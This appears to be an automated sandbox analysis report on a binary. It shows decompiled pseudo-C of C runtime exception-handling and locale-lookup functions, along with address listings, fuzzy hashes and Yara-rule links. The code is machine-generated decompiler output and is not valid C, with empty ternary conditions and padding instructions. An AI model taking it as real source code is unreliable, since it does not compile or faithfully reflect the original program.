                                            • Instruction Fuzzy Hash: 57919075E062148FCB12DF98C9A0BADBBB5EF49320F254299E815AB3D1D731AD01CBD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00311300, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00311300(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t45;
				signed int _t49;
				intOrPtr _t54;
				intOrPtr _t58;
				void* _t60;
				intOrPtr _t61;
				intOrPtr* _t64;
				intOrPtr _t70;
				signed int* _t73;
				void* _t75;
				void* _t76;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t64 = _a4;
				_t77 =  *_t64 - 0x80000003;
				if( *_t64 == 0x80000003) {
					L19:
					return _t44;
				}
				_t45 = E00315E81(_t60, _t64, _t77);
				_t54 = _a20;
				_t78 =  *((intOrPtr*)(_t45 + 0x80));
				if( *((intOrPtr*)(_t45 + 0x80)) == 0) {
					L6:
					if( *((intOrPtr*)(_t54 + 0xc)) == 0) {
						E003168A0();
					}
					_t44 = E0030F82D(_t57, _t54, _a28, _a24,  &_v12,  &_v8);
					_t58 = _v12;
					_t76 = _t75 + 0x14;
					_t61 = _v8;
					if(_t58 >= _t61) {
						L18:
						goto L19;
					} else {
						_t17 = _t44 + 0xc; // 0xc
						_t73 = _t17;
						_t44 = _a24;
						do {
							if(_t44 >=  *((intOrPtr*)(_t73 - 0xc)) && _t44 <=  *((intOrPtr*)(_t73 - 8))) {
								_t49 =  *_t73 << 4;
								if( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) == 0) {
									L14:
									_t50 = _t49 + _t73[1] + 0xfffffff0;
									_t70 = _a4;
									if(( *(_t49 + _t73[1] + 0xfffffff0) & 0x00000040) == 0) {
										_push(1);
										_t35 = _t73 - 0xc; // 0x0
										E00310E9B(_t54, _t73, _t70, _a8, _a12, _a16, _t54, _t50, 0, _t35, _a28, _a32);
										_t61 = _v8;
										_t76 = _t76 + 0x2c;
										_t58 = _v12;
									}
									L16:
									_t44 = _a24;
									goto L17;
								}
								_t61 = _v8;
								_t54 = _a20;
								if( *((char*)( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) + 8)) != 0) {
									goto L16;
								}
								goto L14;
							}
							L17:
							_t58 = _t58 + 1;
							_t73 =  &(_t73[5]);
							_v12 = _t58;
						} while (_t58 < _t61);
						goto L18;
					}
				}
				__imp__EncodePointer(0);
				if( *((intOrPtr*)(E00315E81(_t60, _t64, _t78) + 0x80)) != _t45 &&  *_t64 != 0xe0434f4d &&  *_t64 != 0xe0434352) {
					_t44 = E0030F756(_t64, _a8, _a12, _a16, _t54, _a28, _a32);
					_t75 = _t75 + 0x1c;
					if(_t44 != 0) {
						goto L18;
					}
				}
			}




















                                            0x00311300
                                            0x00311303
                                            0x00311304
                                            0x00311306
                                            0x00311309
                                            0x0031130f
                                            0x00311417
                                            0x0031141b
                                            0x0031141b
                                            0x00311317
                                            0x0031131c
                                            0x0031131f
                                            0x00311326
                                            0x00311370
                                            0x00311374
                                            0x00311376
                                            0x00311376
                                            0x0031138a
                                            0x0031138f
                                            0x00311392
                                            0x00311395
                                            0x0031139a
                                            0x00311415
                                            0x00000000
                                            0x0031139c
                                            0x0031139c
                                            0x0031139c
                                            0x0031139f
                                            0x003113a2
                                            0x003113a5
                                            0x003113b1
                                            0x003113ba
                                            0x003113cf
                                            0x003113d5
                                            0x003113d7
                                            0x003113dd
                                            0x003113df
                                            0x003113e4
                                            0x003113f9
                                            0x003113fe
                                            0x00311401
                                            0x00311404
                                            0x00311404
                                            0x00311407
                                            0x00311407
                                            0x00000000
                                            0x00311407
                                            0x003113c3
                                            0x003113ca
                                            0x003113cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003113cd
                                            0x0031140a
                                            0x0031140a
                                            0x0031140b
                                            0x0031140e
                                            0x00311411
                                            0x00000000
                                            0x003113a2
                                            0x0031139a
                                            0x0031132a
                                            0x0031133d
                                            0x00311360
                                            0x00311365
                                            0x0031136a
                                            0x00000000
                                            0x00000000
                                            0x0031136a

                                            APIs
                                              • Part of subcall function 00315E81: __getptd_noexit.LIBCMT ref: 00315E82
                                            • EncodePointer.KERNEL32(00000000), ref: 0031132A
                                            • _CallSETranslator.LIBCMT ref: 00311360
                                            • _GetRangeOfTrysToCheck.LIBCMT ref: 0031138A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.694540473.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000001.00000002.694534469.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694564883.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694573350.000000000032E000.00000008.00020000.sdmp Download File
                                            • Associated: 00000001.00000002.694581026.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CallCheckEncodePointerRangeTranslatorTrys__getptd_noexit
                                            • String ID: MOC$RCC$eK
                                            • API String ID: 3337196757-894808068
                                            • Opcode ID: d35e6503f393a2db09363e37f560616f3dcb43ddc7b4cae3694cc0ba0c65e437
                                            • Instruction ID: 8c450f798455e31531e7368ceebd3fae0dbc30968e1d8a877666d1c0b93863e8
                                            • Opcode Fuzzy Hash: d35e6503f393a2db09363e37f560616f3dcb43ddc7b4cae3694cc0ba0c65e437
                                            • Instruction Fuzzy Hash: BE41A936500109EFDF1ACF45C881AEAB77AEF48714F2A8558FA145B251C735ED91CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307980, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 87%
                                            			E00307980(intOrPtr* _a4) {
				intOrPtr* _v0;
				signed int* _v4;
				signed int* _v8;
				void* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v48;
				char _v56;
				intOrPtr _v88;
				char _v96;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v128;
				signed int _v132;
				char _v148;
				intOrPtr* _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				char _v169;
				signed int _v172;
				void* _t172;
				void* _t180;
				intOrPtr _t196;
				intOrPtr* _t199;
				intOrPtr _t200;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				intOrPtr _t208;
				signed int _t213;
				signed int _t217;
				signed int _t221;
				signed int _t226;
				signed int _t230;
				signed int _t234;
				intOrPtr _t239;
				void* _t244;
				signed int _t249;
				signed int _t250;
				void* _t255;
				signed int _t260;
				signed int _t261;
				void* _t266;
				signed int _t271;
				signed int _t272;
				signed int* _t273;
				intOrPtr _t274;
				intOrPtr _t275;
				intOrPtr _t276;
				signed int* _t277;
				intOrPtr _t278;
				intOrPtr _t281;
				intOrPtr _t286;
				signed int _t291;
				intOrPtr* _t294;
				signed int _t296;
				intOrPtr* _t297;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				intOrPtr _t308;
				void* _t321;
				intOrPtr _t322;
				signed int _t323;
				intOrPtr* _t326;
				signed char* _t327;
				signed char* _t328;
				signed char* _t329;
				signed char* _t332;
				signed char* _t333;
				signed char* _t334;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int* _t341;
				signed int* _t342;
				intOrPtr* _t343;
				intOrPtr* _t344;
				void* _t345;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				E003099F7( &_v16, 0);
				_t338 =  *0x333a5c;
				_t273 =  *0x333a54;
				_v8 = _t273;
				if(_t338 == 0) {
					E003099F7( &_v12, _t338);
					if( *0x333a5c == _t338) {
						_t271 =  *0x331924; // 0x0
						_t272 = _t271 + 1;
						 *0x331924 = _t272;
						 *0x333a5c = _t272;
					}
					E00309A52( &_v12);
					_t338 =  *0x333a5c;
				}
				_t281 =  *_a4;
				if(_t338 >=  *((intOrPtr*)(_t281 + 0xc))) {
					_t342 = 0;
					goto L8;
				} else {
					_t342 =  *( *((intOrPtr*)(_t281 + 8)) + _t338 * 4);
					if(_t342 != 0) {
						L16:
						E00309A52( &_v16);
						return _t342;
					} else {
						L8:
						if( *((char*)(_t281 + 0x14)) == 0) {
							L11:
							if(_t342 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t266 = E0030866D();
							if(_t338 >=  *((intOrPtr*)(_t266 + 0xc))) {
								L12:
								if(_t273 == 0) {
									_t172 = E00307FD0(_t321,  &_v8, _a4);
									_t354 = _t353 + 8;
									if(_t172 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t350 = _t354;
										_t355 = _t354 - 0x18;
										_push(_t273);
										_push(_t342);
										_push(_t338);
										E003099F7( &_v56, 0);
										_t339 =  *0x333a64;
										_t274 =  *0x333a58;
										_v48 = _t274;
										if(_t339 == 0) {
											E003099F7( &_v16, _t339);
											if( *0x333a64 == _t339) {
												_t260 =  *0x331924; // 0x0
												_t261 = _t260 + 1;
												 *0x331924 = _t261;
												 *0x333a64 = _t261;
											}
											E00309A52( &_v16);
											_t339 =  *0x333a64;
										}
										_t286 =  *_v0;
										if(_t339 >=  *((intOrPtr*)(_t286 + 0xc))) {
											_t343 = 0;
											goto L26;
										} else {
											_t343 =  *((intOrPtr*)( *((intOrPtr*)(_t286 + 8)) + _t339 * 4));
											if(_t343 != 0) {
												L34:
												E00309A52( &_v20);
												return _t343;
											} else {
												L26:
												if( *((char*)(_t286 + 0x14)) == 0) {
													L29:
													if(_t343 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t255 = E0030866D();
													if(_t339 >=  *((intOrPtr*)(_t255 + 0xc))) {
														L30:
														if(_t274 == 0) {
															_t180 = E003080F0(_t321,  &_v12, _v0);
															_t356 = _t355 + 8;
															if(_t180 == 0xffffffff) {
																E0030D31B( &_v32, "bad cast");
																E0030F4FA( &_v32, 0x32d290);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t350);
																_t351 = _t356;
																_push(_t274);
																_push(_t343);
																_push(_t339);
																E003099F7( &_v96, 0);
																_t340 =  *0x333a60;
																_t275 =  *0x333a50;
																_v88 = _t275;
																if(_t340 == 0) {
																	E003099F7( &_v20, _t340);
																	if( *0x333a60 == _t340) {
																		_t249 =  *0x331924; // 0x0
																		_t250 = _t249 + 1;
																		 *0x331924 = _t250;
																		 *0x333a60 = _t250;
																	}
																	E00309A52( &_v20);
																	_t340 =  *0x333a60;
																}
																_t291 =  *_v4;
																if(_t340 >=  *((intOrPtr*)(_t291 + 0xc))) {
																	_t344 = 0;
																	goto L44;
																} else {
																	_t344 =  *((intOrPtr*)( *((intOrPtr*)(_t291 + 8)) + _t340 * 4));
																	if(_t344 != 0) {
																		L52:
																		E00309A52( &_v24);
																		return _t344;
																	} else {
																		L44:
																		if( *((char*)(_t291 + 0x14)) == 0) {
																			L47:
																			if(_t344 != 0) {
																				goto L52;
																			} else {
																				goto L48;
																			}
																		} else {
																			_t244 = E0030866D();
																			if(_t340 >=  *((intOrPtr*)(_t244 + 0xc))) {
																				L48:
																				if(_t275 == 0) {
																					if(E00308170(_t321,  &_v16, _v4) == 0xffffffff) {
																						E0030D31B( &_v36, "bad cast");
																						E0030F4FA( &_v36, 0x32d290);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t351);
																						_t294 = _v104;
																						_t322 =  *_t294;
																						_push(_t275);
																						_t276 = _v108;
																						_push(_t344);
																						_push(_t340);
																						if(_t322 != 0) {
																							_t239 = _t322;
																							do {
																								if(_t239 == _t322) {
																									_t276 = _t276 + 1;
																								}
																								_t239 =  *((intOrPtr*)(_t294 + 1));
																								_t294 = _t294 + 1;
																							} while (_t239 != 0);
																						}
																						_v156 = _t276;
																						_v128 = 0xf;
																						_v132 = 0;
																						_v148 = 0;
																						E003060B0( &_v148, _t276, 0);
																						_t277 = _v4;
																						_t296 = 0xfffffffe;
																						_t341 = _v8;
																						_v172 = 1;
																						while(1) {
																							_t323 = 0;
																							_v168 = _t296;
																							_t345 = 0;
																							_v169 = 0;
																							_v160 = 0;
																							if(_v156 <= 0) {
																								break;
																							} else {
																								goto L61;
																							}
																							do {
																								L61:
																								_t297 = _a4;
																								_t196 =  *((intOrPtr*)(_t345 + _t297));
																								if(_t196 != 0) {
																									_t308 =  *_t297;
																									_t278 = _a4;
																									while(_t196 != _t308) {
																										_t196 =  *((intOrPtr*)(_t345 + _t278 + 1));
																										_t345 = _t345 + 1;
																										if(_t196 != 0) {
																											continue;
																										}
																										break;
																									}
																									_t277 = _v4;
																									_t297 = _a4;
																								}
																								_t198 =  >=  ? _v148 :  &_v148;
																								if( *((char*)(( >=  ? _v148 :  &_v148) + _t323)) == 0) {
																									_t345 = _t345 + _v164;
																									_t199 = _t345 + _t297;
																									_v152 = _t199;
																									_t200 =  *_t199;
																									if(_t200 ==  *_t297 || _t200 == 0) {
																										_t325 =  >=  ? _v148 :  &_v148;
																										_t299 =  <  ? _v164 & 0x000000ff : 0x7f;
																										_t203 = _v160;
																										 *((char*)(( >=  ? _v148 :  &_v148) + _t203)) =  <  ? _v164 & 0x000000ff : 0x7f;
																										_t323 = _t203;
																										_t296 = _t323;
																										_v168 = _t296;
																										goto L107;
																									} else {
																										if(_t341[1] == 0) {
																											_t307 =  *_t341;
																											if(_t307 == 0) {
																												L78:
																												 *_t341 = 0;
																											} else {
																												_t334 =  *( *(_t307 + 0x1c));
																												if(_t334 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t307 + 0x2c)))) <= 0) {
																													_t234 =  *((intOrPtr*)( *_t307 + 0x18))();
																												} else {
																													_t234 =  *_t334 & 0x000000ff;
																												}
																												if(_t234 == 0xffffffff) {
																													goto L78;
																												} else {
																													_t341[1] = _t234;
																												}
																											}
																											_t341[1] = 1;
																										}
																										if(_t277[1] == 0) {
																											_t306 =  *_t277;
																											if(_t306 == 0) {
																												L88:
																												 *_t277 = 0;
																											} else {
																												_t333 =  *( *(_t306 + 0x1c));
																												if(_t333 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t306 + 0x2c)))) <= 0) {
																													_t230 =  *((intOrPtr*)( *_t306 + 0x18))();
																												} else {
																													_t230 =  *_t333 & 0x000000ff;
																												}
																												if(_t230 == 0xffffffff) {
																													goto L88;
																												} else {
																													_t277[1] = _t230;
																												}
																											}
																											_t277[1] = 1;
																										}
																										_t303 =  *_t341;
																										if(_t303 != 0) {
																											if( *_t277 != 0) {
																												goto L92;
																											} else {
																												goto L94;
																											}
																										} else {
																											if( *_t277 != _t303) {
																												L94:
																												if(_t341[1] == 0) {
																													if(_t303 == 0) {
																														L102:
																														 *_t341 = 0;
																													} else {
																														_t332 =  *( *(_t303 + 0x1c));
																														if(_t332 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t303 + 0x2c)))) <= 0) {
																															_t226 =  *((intOrPtr*)( *_t303 + 0x18))();
																														} else {
																															_t226 =  *_t332 & 0x000000ff;
																														}
																														if(_t226 == 0xffffffff) {
																															goto L102;
																														} else {
																															_t341[1] = _t226;
																														}
																													}
																													_t341[1] = 1;
																												}
																												if( *_v152 != _t341[1]) {
																													goto L92;
																												} else {
																													_t323 = _v160;
																													_t204 = 1;
																													_t296 = _v168;
																													_v169 = 1;
																												}
																											} else {
																												L92:
																												_t331 =  >=  ? _v148 :  &_v148;
																												_t305 =  <  ? _v164 & 0x000000ff : 0x7f;
																												_t221 = _v160;
																												 *((char*)(( >=  ? _v148 :  &_v148) + _t221)) =  <  ? _v164 & 0x000000ff : 0x7f;
																												_t323 = _t221;
																												_t296 = _v168;
																												goto L107;
																											}
																										}
																									}
																								} else {
																									_t296 = _v168;
																									_t237 =  >=  ? _v148 :  &_v148;
																									_t345 = _t345 +  *((char*)(( >=  ? _v148 :  &_v148) + _t323));
																									L107:
																									_t204 = _v169;
																								}
																								_t323 = _t323 + 1;
																								_v160 = _t323;
																							} while (_t323 < _v156);
																							if(_t204 != 0) {
																								if(_t341[1] == 0) {
																									_t302 =  *_t341;
																									if(_t302 == 0) {
																										L118:
																										 *_t341 = 0;
																									} else {
																										_t329 =  *( *(_t302 + 0x1c));
																										if(_t329 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t302 + 0x2c)))) <= 0) {
																											_t217 =  *((intOrPtr*)( *_t302 + 0x18))();
																										} else {
																											_t217 =  *_t329 & 0x000000ff;
																										}
																										if(_t217 == 0xffffffff) {
																											goto L118;
																										} else {
																											_t341[1] = _t217;
																										}
																									}
																									_t341[1] = 1;
																								}
																								if(_t277[1] == 0) {
																									_t301 =  *_t277;
																									if(_t301 == 0) {
																										L128:
																										 *_t277 = 0;
																									} else {
																										_t328 =  *( *(_t301 + 0x1c));
																										if(_t328 == 0 ||  *((intOrPtr*)( *((intOrPtr*)(_t301 + 0x2c)))) <= 0) {
																											_t213 =  *((intOrPtr*)( *_t301 + 0x18))();
																										} else {
																											_t213 =  *_t328 & 0x000000ff;
																										}
																										if(_t213 == 0xffffffff) {
																											goto L128;
																										} else {
																											_t277[1] = _t213;
																										}
																									}
																									_t277[1] = 1;
																								}
																								_t300 =  *_t341;
																								if(_t300 != 0) {
																									if( *_t277 != 0) {
																										goto L132;
																									} else {
																										goto L136;
																									}
																								} else {
																									if( *_t277 != _t300) {
																										L136:
																										_v164 = _v164 + 1;
																										if(_t300 == 0) {
																											L143:
																											 *_t341 = 0;
																											_t296 = _t300 | 0xffffffff;
																											_t341[1] = 1;
																											continue;
																										} else {
																											if( *( *(_t300 + 0x1c)) == 0) {
																												L140:
																												_t207 = ( *_t300)[0x1c]();
																											} else {
																												_t326 =  *((intOrPtr*)(_t300 + 0x2c));
																												_t208 =  *_t326;
																												if(_t208 <= 0) {
																													goto L140;
																												} else {
																													 *_t326 = _t208 - 1;
																													_t300 =  *(_t300 + 0x1c);
																													_t327 =  *_t300;
																													 *_t300 =  &(_t327[1]);
																													_t207 =  *_t327 & 0x000000ff;
																												}
																											}
																											if(_t207 == 0xffffffff) {
																												goto L143;
																											} else {
																												_t341[1] = 0;
																												_t296 = _t300 | 0xffffffff;
																												continue;
																											}
																										}
																										goto L145;
																									} else {
																										L132:
																										_t296 = _v168;
																									}
																								}
																							}
																							break;
																						}
																						if(_v128 < 0x10) {
																							return _t296;
																						} else {
																							L0030DF6A(_v148);
																							return _v168;
																						}
																					} else {
																						_t344 = _v16;
																						 *0x333a50 = _t344;
																						 *((intOrPtr*)( *_t344 + 4))();
																						E00308645(_t344);
																						goto L52;
																					}
																				} else {
																					E00309A52( &_v24);
																					return _t275;
																				}
																			} else {
																				_t344 =  *((intOrPtr*)( *((intOrPtr*)(_t244 + 8)) + _t340 * 4));
																				goto L47;
																			}
																		}
																	}
																}
															} else {
																_t343 = _v12;
																 *0x333a58 = _t343;
																 *((intOrPtr*)( *_t343 + 4))();
																E00308645(_t343);
																goto L34;
															}
														} else {
															E00309A52( &_v20);
															return _t274;
														}
													} else {
														_t343 =  *((intOrPtr*)( *((intOrPtr*)(_t255 + 8)) + _t339 * 4));
														goto L29;
													}
												}
											}
										}
									} else {
										_t342 = _v8;
										 *0x333a54 = _t342;
										 *((intOrPtr*)( *_t342 + 4))();
										E00308645(_t342);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t273;
								}
							} else {
								_t342 =  *( *((intOrPtr*)(_t266 + 8)) + _t338 * 4);
								goto L11;
							}
						}
					}
				}
				L145:
			}

































































































                                            0x0030798e
                                            0x00307993
                                            0x00307999
                                            0x0030799f
                                            0x003079a4
                                            0x003079aa
                                            0x003079b5
                                            0x003079b7
                                            0x003079bc
                                            0x003079bd
                                            0x003079c2
                                            0x003079c2
                                            0x003079ca
                                            0x003079cf
                                            0x003079cf
                                            0x003079d8
                                            0x003079dd
                                            0x003079eb
                                            0x00000000
                                            0x003079df
                                            0x003079e2
                                            0x003079e7
                                            0x00307a4b
                                            0x00307a4e
                                            0x00307a5b
                                            0x003079e9
                                            0x003079ed
                                            0x003079f1
                                            0x00307a03
                                            0x00307a05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003079f3
                                            0x003079f3
                                            0x003079fb
                                            0x00307a07
                                            0x00307a09
                                            0x00307a25
                                            0x00307a2a
                                            0x00307a30
                                            0x00307a64
                                            0x00307a72
                                            0x00307a77
                                            0x00307a78
                                            0x00307a79
                                            0x00307a7a
                                            0x00307a7b
                                            0x00307a7c
                                            0x00307a7d
                                            0x00307a7e
                                            0x00307a7f
                                            0x00307a81
                                            0x00307a83
                                            0x00307a86
                                            0x00307a87
                                            0x00307a88
                                            0x00307a8e
                                            0x00307a93
                                            0x00307a99
                                            0x00307a9f
                                            0x00307aa4
                                            0x00307aaa
                                            0x00307ab5
                                            0x00307ab7
                                            0x00307abc
                                            0x00307abd
                                            0x00307ac2
                                            0x00307ac2
                                            0x00307aca
                                            0x00307acf
                                            0x00307acf
                                            0x00307ad8
                                            0x00307add
                                            0x00307aeb
                                            0x00000000
                                            0x00307adf
                                            0x00307ae2
                                            0x00307ae7
                                            0x00307b4b
                                            0x00307b4e
                                            0x00307b5b
                                            0x00307ae9
                                            0x00307aed
                                            0x00307af1
                                            0x00307b03
                                            0x00307b05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307af3
                                            0x00307af3
                                            0x00307afb
                                            0x00307b07
                                            0x00307b09
                                            0x00307b25
                                            0x00307b2a
                                            0x00307b30
                                            0x00307b64
                                            0x00307b72
                                            0x00307b77
                                            0x00307b78
                                            0x00307b79
                                            0x00307b7a
                                            0x00307b7b
                                            0x00307b7c
                                            0x00307b7d
                                            0x00307b7e
                                            0x00307b7f
                                            0x00307b80
                                            0x00307b81
                                            0x00307b86
                                            0x00307b87
                                            0x00307b88
                                            0x00307b8e
                                            0x00307b93
                                            0x00307b99
                                            0x00307b9f
                                            0x00307ba4
                                            0x00307baa
                                            0x00307bb5
                                            0x00307bb7
                                            0x00307bbc
                                            0x00307bbd
                                            0x00307bc2
                                            0x00307bc2
                                            0x00307bca
                                            0x00307bcf
                                            0x00307bcf
                                            0x00307bd8
                                            0x00307bdd
                                            0x00307beb
                                            0x00000000
                                            0x00307bdf
                                            0x00307be2
                                            0x00307be7
                                            0x00307c4b
                                            0x00307c4e
                                            0x00307c5b
                                            0x00307be9
                                            0x00307bed
                                            0x00307bf1
                                            0x00307c03
                                            0x00307c05
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307bf3
                                            0x00307bf3
                                            0x00307bfb
                                            0x00307c07
                                            0x00307c09
                                            0x00307c30
                                            0x00307c64
                                            0x00307c72
                                            0x00307c77
                                            0x00307c78
                                            0x00307c79
                                            0x00307c7a
                                            0x00307c7b
                                            0x00307c7c
                                            0x00307c7d
                                            0x00307c7e
                                            0x00307c7f
                                            0x00307c80
                                            0x00307c86
                                            0x00307c8c
                                            0x00307c8e
                                            0x00307c8f
                                            0x00307c92
                                            0x00307c93
                                            0x00307c96
                                            0x00307c98
                                            0x00307ca0
                                            0x00307ca2
                                            0x00307ca4
                                            0x00307ca4
                                            0x00307ca5
                                            0x00307ca8
                                            0x00307ca9
                                            0x00307ca0
                                            0x00307cb4
                                            0x00307cb8
                                            0x00307cc0
                                            0x00307cc8
                                            0x00307ccd
                                            0x00307cd2
                                            0x00307cd5
                                            0x00307cda
                                            0x00307cdd
                                            0x00307ce5
                                            0x00307ce5
                                            0x00307ce7
                                            0x00307ceb
                                            0x00307ced
                                            0x00307cf2
                                            0x00307cfa
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d00
                                            0x00307d00
                                            0x00307d00
                                            0x00307d03
                                            0x00307d08
                                            0x00307d0a
                                            0x00307d0c
                                            0x00307d10
                                            0x00307d14
                                            0x00307d18
                                            0x00307d1b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307d1b
                                            0x00307d1d
                                            0x00307d20
                                            0x00307d20
                                            0x00307d2c
                                            0x00307d35
                                            0x00307d54
                                            0x00307d58
                                            0x00307d5b
                                            0x00307d5f
                                            0x00307d63
                                            0x00307e8f
                                            0x00307e9b
                                            0x00307e9e
                                            0x00307ea2
                                            0x00307ea5
                                            0x00307ea7
                                            0x00307ea9
                                            0x00000000
                                            0x00307d71
                                            0x00307d75
                                            0x00307d77
                                            0x00307d7b
                                            0x00307da2
                                            0x00307da2
                                            0x00307d7d
                                            0x00307d80
                                            0x00307d84
                                            0x00307d95
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d8e
                                            0x00307d9b
                                            0x00000000
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9d
                                            0x00307d9b
                                            0x00307da8
                                            0x00307da8
                                            0x00307db0
                                            0x00307db2
                                            0x00307db6
                                            0x00307ddd
                                            0x00307ddd
                                            0x00307db8
                                            0x00307dbb
                                            0x00307dbf
                                            0x00307dd0
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dc9
                                            0x00307dd6
                                            0x00000000
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd8
                                            0x00307dd6
                                            0x00307de3
                                            0x00307de3
                                            0x00307de7
                                            0x00307deb
                                            0x00307e27
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307ded
                                            0x00307def
                                            0x00307e29
                                            0x00307e2d
                                            0x00307e31
                                            0x00307e58
                                            0x00307e58
                                            0x00307e33
                                            0x00307e36
                                            0x00307e3a
                                            0x00307e4b
                                            0x00307e44
                                            0x00307e44
                                            0x00307e44
                                            0x00307e51
                                            0x00000000
                                            0x00307e53
                                            0x00307e53
                                            0x00307e53
                                            0x00307e51
                                            0x00307e5e
                                            0x00307e5e
                                            0x00307e6b
                                            0x00000000
                                            0x00307e6d
                                            0x00307e6d
                                            0x00307e71
                                            0x00307e73
                                            0x00307e77
                                            0x00307e77
                                            0x00307df1
                                            0x00307df1
                                            0x00307e03
                                            0x00307e0f
                                            0x00307e12
                                            0x00307e16
                                            0x00307e19
                                            0x00307e1b
                                            0x00000000
                                            0x00307e1b
                                            0x00307def
                                            0x00307deb
                                            0x00307d37
                                            0x00307d40
                                            0x00307d44
                                            0x00307d4d
                                            0x00307ead
                                            0x00307ead
                                            0x00307ead
                                            0x00307eb1
                                            0x00307eb2
                                            0x00307eb6
                                            0x00307ec2
                                            0x00307ecc
                                            0x00307ece
                                            0x00307ed2
                                            0x00307ef9
                                            0x00307ef9
                                            0x00307ed4
                                            0x00307ed7
                                            0x00307edb
                                            0x00307eec
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ee5
                                            0x00307ef2
                                            0x00000000
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef4
                                            0x00307ef2
                                            0x00307eff
                                            0x00307eff
                                            0x00307f07
                                            0x00307f09
                                            0x00307f0d
                                            0x00307f34
                                            0x00307f34
                                            0x00307f0f
                                            0x00307f12
                                            0x00307f16
                                            0x00307f27
                                            0x00307f20
                                            0x00307f20
                                            0x00307f20
                                            0x00307f2d
                                            0x00000000
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2f
                                            0x00307f2d
                                            0x00307f3a
                                            0x00307f3a
                                            0x00307f3e
                                            0x00307f42
                                            0x00307f6d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307f44
                                            0x00307f46
                                            0x00307f6f
                                            0x00307f6f
                                            0x00307f75
                                            0x00307fb0
                                            0x00307fb0
                                            0x00307fb6
                                            0x00307fb9
                                            0x00000000
                                            0x00307f77
                                            0x00307f7d
                                            0x00307f9a
                                            0x00307f9c
                                            0x00307f7f
                                            0x00307f7f
                                            0x00307f82
                                            0x00307f86
                                            0x00000000
                                            0x00307f88
                                            0x00307f89
                                            0x00307f8b
                                            0x00307f8e
                                            0x00307f93
                                            0x00307f95
                                            0x00307f95
                                            0x00307f86
                                            0x00307fa2
                                            0x00000000
                                            0x00307fa4
                                            0x00307fa4
                                            0x00307fa8
                                            0x00000000
                                            0x00307fa8
                                            0x00307fa2
                                            0x00000000
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f48
                                            0x00307f46
                                            0x00307f42
                                            0x00000000
                                            0x00307ec2
                                            0x00307f51
                                            0x00307fca
                                            0x00307f53
                                            0x00307f57
                                            0x00307f69
                                            0x00307f69
                                            0x00307c32
                                            0x00307c32
                                            0x00307c37
                                            0x00307c3f
                                            0x00307c43
                                            0x00000000
                                            0x00307c48
                                            0x00307c0b
                                            0x00307c10
                                            0x00307c1d
                                            0x00307c1d
                                            0x00307bfd
                                            0x00307c00
                                            0x00000000
                                            0x00307c00
                                            0x00307bfb
                                            0x00307bf1
                                            0x00307be7
                                            0x00307b32
                                            0x00307b32
                                            0x00307b37
                                            0x00307b3f
                                            0x00307b43
                                            0x00000000
                                            0x00307b48
                                            0x00307b0b
                                            0x00307b10
                                            0x00307b1d
                                            0x00307b1d
                                            0x00307afd
                                            0x00307b00
                                            0x00000000
